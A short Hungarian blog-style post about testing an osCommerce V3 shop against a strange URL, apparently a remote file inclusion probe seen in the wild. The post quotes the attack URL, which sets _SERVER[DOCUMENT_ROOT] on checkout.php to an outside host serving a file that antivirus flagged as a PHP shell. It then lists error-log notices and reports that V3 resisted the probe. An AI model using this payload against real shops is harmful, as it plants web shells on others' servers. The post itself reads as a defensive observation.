Törésteszt oscommerce V3 rendszeren
Felfigyeltem egy furcsa URL-re a minap. Elsőnek nem tudtam mire vélni,
de aztán az eredménye láttán, okosabb lettem. A kód segítségével el lehet különíteni a
védett és a védtelen shopokat.
http:\ezazenshopom.hucheckout.php?_SERVER[DOCUMENT_ROOT]=http:\www.apc.edu.ectemp?
Aztán megnéztem külön a http:\www.apc.edu.ectemp? fájlt is. A panda ezt az üzenetet küldte:
Panda GP 2010 jelentés:
megfertőzte a PHP/Shell vírus, ezért töröltem.
Hogy mik vannak!
Errorlog üzenetek alfa 6-on:
- PHP Notice: Array to string conversion in osc3/includes/functions/html_output.php on line 488
- PHP Notice: Array to string conversion in osc3/includes/functions/general.php on line 51
A hálón rákerestem az irodalomra is.
Nem gondoltam, hogy mennyire egyszerű a probléma, de a V3 most jól vizsgázott. Ez már nem a 2003-as színvonal.